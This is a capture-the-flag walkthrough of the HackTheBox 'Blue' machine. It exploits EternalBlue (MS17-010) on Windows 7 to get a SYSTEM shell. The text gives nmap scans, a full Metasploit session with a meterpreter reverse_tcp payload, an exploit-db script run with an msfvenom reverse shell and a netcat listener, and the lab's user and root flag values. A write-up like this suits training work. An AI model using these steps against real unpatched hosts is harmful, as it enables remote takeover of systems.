Blue Hackthebox

Blue Writeup / Walkthrough Hack the box

Blue Writeup HackTheBox

TL;DR

This is a writeup on Blue which is a Windows box categorized as easy on HackTheBox, and is primarily based on the exploitation of the Eternal Blue MS17-010 exploit without requiring the need for any privilege escalation to obtain the root flag.

Walkthrough

This writeup explains both, exploitation with and without Metasploit.

Blue Writeup: Scanning Network

Let’s start off by running the usual initial nmap scan.

Nmap 7.91 scan initiated as: nmap -sC -sV -n -v -A -oN nmap.initial 10.129.73.158
 Increasing send delay for 10.129.73.158 from 0 to 5 due to 195 out of 648 dropped probes since last increase.
 Nmap scan report for 10.129.73.158
 Host is up (0.17s latency).
 Not shown: 991 closed ports

 PORT      STATE SERVICE      VERSION
 135/tcp   open  msrpc        Microsoft Windows RPC
 139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
 445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
 49152/tcp open  msrpc        Microsoft Windows RPC
 49153/tcp open  msrpc        Microsoft Windows RPC
 49154/tcp open  msrpc        Microsoft Windows RPC
 49155/tcp open  msrpc        Microsoft Windows RPC
 49156/tcp open  msrpc        Microsoft Windows RPC
 49157/tcp open  msrpc        Microsoft Windows RPC

 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
 Uptime guess: 0.006 days (since Wed Jun  2 11:34:09 2021)
 Network Distance: 2 hops
 TCP Sequence Prediction: Difficulty=264 (Good luck!)
 IP ID Sequence Generation: Incremental
 Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
 Host script results:
 |clock-skew: mean: -19m57s, deviation: 34m37s, median: 1s 
 | smb-os-discovery:  
 |   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) 
 |   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional 
 |   Computer name: haris-PC |   NetBIOS computer name: HARIS-PC\x00 
 |   Workgroup: WORKGROUP\x00 
 |  System time: 2021-06-02T16:42:28+01:00
 | smb-security-mode: 
 |   account_used: guest
 |   authentication_level: user
 |   challenge_response: supported
 |_  message_signing: disabled (dangerous, but default)
 | smb2-security-mode: 
 |   2.02: 
 |_    Message signing enabled but not required
 | smb2-time: 
 |   date: 2021-06-02T15:42:31
 |_  start_date: 2021-06-02T15:34:23
 TRACEROUTE (using port 1720/tcp)
 HOP RTT       ADDRESS
 1   168.18 ms 10.10.14.1
 2   168.38 ms 10.129.73.158
 Read data files from: /usr/bin/../share/nmap
 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

We have a plenty of open ports here. Although, Microsoft RPC on port 135netbios-ssn on port 139 and  Microsoft-DS (Directory Services) SMB on port 445 seem to be the juicy ones, along with the PC name being seen as “haris-PC”.

The version on port 445 says that this box is running “Windows 7 Professional 7601 SP1”, and with the box name itself “Blue” we can really look forward to expecting the EternalBlue (MS17-010) vulnerability here. Let’s just confirm it by running the available nmap scripts for SMB vulnerabilities.

In simple words, Server Message Block Protocol (SMB protocol) is basically a client-server communication protocol used for sharing access to files, printers, serial ports, and other resources on a network.

Checking for SMB vulnerabilities using Nmap scripts

We have the following list of nmap scripts targeted towards verifying any SMB vulnerabilities on the target.

Blue Writeup HackTheBox nmap SMB scripts
List of nmap SMB vulnerability scripts

PS- The above list also includes the MS17-010 vulnerability.

Let’s run these SMB targeted scripts on the target using nmap.

┌─[[email protected]]─[~/Desktop/Blue HTB]
 └──╼ nmap --script smb-vuln* -sV -v -p 139,445 10.129.156.45
 Starting Nmap 7.91 ( https://nmap.org )
 Nmap scan report for 10.129.156.45
 Host is up (0.19s latency).

 PORT    STATE SERVICE      VERSION
 139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
 445/tcp open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
 Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

 Host script results:
 |smb-vuln-ms10-054: false 
 |_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND 
 | smb-vuln-ms17-010:  
 |   VULNERABLE: 
 |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) 
 |     State:   VULNERABLE 
 |     IDs:  CVE:CVE-2017-0143 
 |     Risk factor: HIGH 
 |       A critical remote code execution vulnerability exists in Microsoft SMBv1 
 |        servers (ms17-010). 
 |            
 |     Disclosure date: 2017-03-14 
 |     References: 
 |      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ 
 |      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx 
 |      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
 NSE: Script Post-scanning.
 Read data files from: /usr/bin/../share/nmap
 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ 
 Nmap done: 1 IP address (1 host up) scanned in 24.22 seconds
            Raw packets sent: 6 (240B) | Rcvd: 3 (116B)

Great! The box is vulnerable to the Eternal_Blue MS17-010 exploit as expected. Let’s move ahead with the exploitation phase using metasploit.

Blue Writeup: Exploitation (with Metasploit)

Firing up the Metasploit framework and using the MS17-010 exploit on the target.

Please note that your LHOST must be set to the HackTheBox VPN network IP address.

msf5 > search ms17-010
 Matching Modules
 #  Name                                           Disclosure Date  Rank     Check  Description
 ----                                           ---------------  ----     -----  -----------
 0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
 1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
 2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
 3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
 4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
 5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution 

 msf5 > use 2

 msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
 Module options (exploit/windows/smb/ms17_010_eternalblue):
 Name           Current Setting  Required  Description
    ----           ---------------  --------  -----------
    RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
    RPORT          445              yes       The target port (TCP)
    SMBDomain      .                no        (Optional) The Windows domain to use for authentication
    SMBPass                         no        (Optional) The password for the specified username
    SMBUser                         no        (Optional) The username to authenticate as
    VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
    VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.
 Exploit target:
 Id  Name
    --  ----
    0   Windows 7 and Server 2008 R2 (x64) All Service Packs

 msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.129.156.45

 msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
 payload => windows/x64/meterpreter/reverse_tcp

 msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

 [-] 10.129.156.45:445 - Exploit failed: The following options failed to validate: LHOST.
 [*] Exploit completed, but no session was created.
 msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.53
 LHOST => 10.10.14.53
 msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
 [] Started reverse TCP handler on 10.10.14.53:4444  [] 10.129.156.45:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
 [+] 10.129.156.45:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
 [] 10.129.156.45:445     - Scanned 1 of 1 hosts (100% complete) [] 10.129.156.45:445 - Connecting to target for exploitation.
 [+] 10.129.156.45:445 - Connection established for exploitation.
 [+] 10.129.156.45:445 - Target OS selected valid for OS indicated by SMB reply                                                                                    
 [] 10.129.156.45:445 - CORE raw buffer dump (42 bytes)                                                                                                            [] 10.129.156.45:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes                                                             
 [] 10.129.156.45:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv                                                              [] 10.129.156.45:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1                                                                   
 [+] 10.129.156.45:445 - Target arch selected valid for arch indicated by DCE/RPC reply                                                                            
 [] 10.129.156.45:445 - Trying exploit with 12 Groom Allocations.                                                                                                  [] 10.129.156.45:445 - Sending all but last fragment of exploit packet                                                                                           
 [] 10.129.156.45:445 - Starting non-paged pool grooming                                                                                                           [+] 10.129.156.45:445 - Sending SMBv2 buffers                                                                                                                      [+] 10.129.156.45:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.                                                                      [] 10.129.156.45:445 - Sending final SMBv2 buffers.                                                                                                              
 [] 10.129.156.45:445 - Sending last fragment of exploit packet!                                                                                                   [] 10.129.156.45:445 - Receiving response from exploit packet                                                                                                    
 [+] 10.129.156.45:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!                                                                                
 [] 10.129.156.45:445 - Sending egg to corrupted connection.                                                                                                       [] 10.129.156.45:445 - Triggering free of corrupted buffer.                                                                                                      
 [] Sending stage (201283 bytes) to 10.129.156.45                                                                                                                  [] Meterpreter session 1 opened (10.10.14.53:4444 -> 10.129.156.45:49158) at 2021-06-03 09:46:36 -0400                                                                                                                                                                                                                 
 [+] 10.129.156.45:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=                                                                             
 [+] 10.129.156.45:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=                                                                             
 [+] 10.129.156.45:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=      
                                                                       
 meterpreter > sysinfo                                                                                                                                             
 Computer        : HARIS-PC
 OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
 Architecture    : x64
 System Language : en_GB
 Domain          : WORKGROUP
 Logged On Users : 0
 Meterpreter     : x64/windows

 meterpreter > getuid
 Server username: NT AUTHORITY\SYSTEM

 meterpreter > shell
 Process 2904 created.
 Channel 1 created.
 Microsoft Windows [Version 6.1.7601]
 Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

 C:\Windows\system32> whoami
 whoami
 nt authority\system
 C:\Users> dir
 dir
  Volume in drive C has no label.
  Volume Serial Number is A0EF-1911
 Directory of C:\Users
 21/07/2017  07:56    
          .
 21/07/2017  07:56              ..
 21/07/2017  07:56              Administrator
 14/07/2017  14:45              haris
 12/04/2011  08:51              Public
                0 File(s)              0 bytes
                5 Dir(s)  17,254,989,824 bytes free                                                                                                                         

Oh man, this was pretty easy! We are right away AUTHORITY\SYSTEM .

Blue Writeup: Exploitation (without Metasploit)

Searching for the MS17-010 exploit.

Blue HackTheBox Writeup: Searching for exploit
Searching for exploit

Let’s create a copy of this exploit to our current directory. If you didn’t already know, instead of copying we can also specify the exploit ID along with the –mirror flag in searchsploit to create a copy of the exploit in the current directory.

Blue HackTheBox Writeup: Copying the exploit
Copying the exploit

After frisking through the exploit code, I figured the following alterations that were needed to be done.

  • After a lil enumeration we found out that “guest” login is allowed on the machine, so we need to add ‘guest’ in the USERNAME field of the exploit.
enu4linux results
USERNAME
  • Creating a reverse shell payload using msfvenom, and specifying the path to this payload in the exploit.
msfvenom payload
adding path to payload

Let’s now open a listener on port 4444

listener port 4444

And run the MS17-010 python exploit.

┌─[[email protected]]─[~/Desktop/BlueHTB]
└──╼ python 42315.py 10.129.159.0

Getting a reverse shell.

┌─[[email protected]]─[~/Desktop/BlueHTB]
└──╼ nc -nlvp 4444 
listening on [any] 4444 ... 
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.40] 49158 
Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. 

C:\Windows\system32>whoami 
nt authority\system

We are AUTHORITY\SYSTEM . Let’s quickly retrieve the flags.

Blue Writeup: User Flag

C:\Users> cd haris\Desktop 

C:\Users\haris\Desktop> type user.txt
4c546aea7dbee75cbd71de245c8deea9

Blue Writeup: Root Flag

C:\Users> cd Administrator\Desktop\ 

C:\Users\Administrator\Desktop> type root.txt 
ff548eb71e920ff6c08843ce9df4e717 

Until next time, do checkout our other writeups here.

Posts created 2

Leave a Reply

Your email address will not be published. Required fields are marked *

Related Posts

Begin typing your search term above and press enter to search. Press ESC to cancel.

Back To Top